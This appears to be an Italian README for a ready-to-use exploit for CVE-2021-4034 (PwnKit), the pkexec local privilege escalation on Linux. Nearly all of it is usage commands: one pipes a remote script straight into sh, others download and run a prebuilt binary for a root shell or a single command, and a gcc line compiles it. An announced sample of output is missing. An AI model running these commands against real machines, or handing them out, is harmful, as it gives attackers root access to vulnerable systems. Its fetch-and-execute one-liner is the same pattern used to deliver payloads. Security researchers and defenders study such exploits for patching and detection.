
Exploit autonomo per CVE-2021-4034 (PwnKit) che mira all'escalation locale dei privilegi di pkexec su distribuzioni Linux. Fornisce shell interattiva o esecuzione di singolo comando.
Exploit autonomo per CVE-2021-4034 - Escalation dei privilegi locale di Pkexec
Dovrebbe funzionare subito su distribuzioni Linux vulnerabili basate su Ubuntu, Debian, Fedora e CentOS.
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # shell interattiva
./PwnKit 'id' # comando singolo
Eseguire l'exploit su versioni corrette produrrà il seguente output.
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC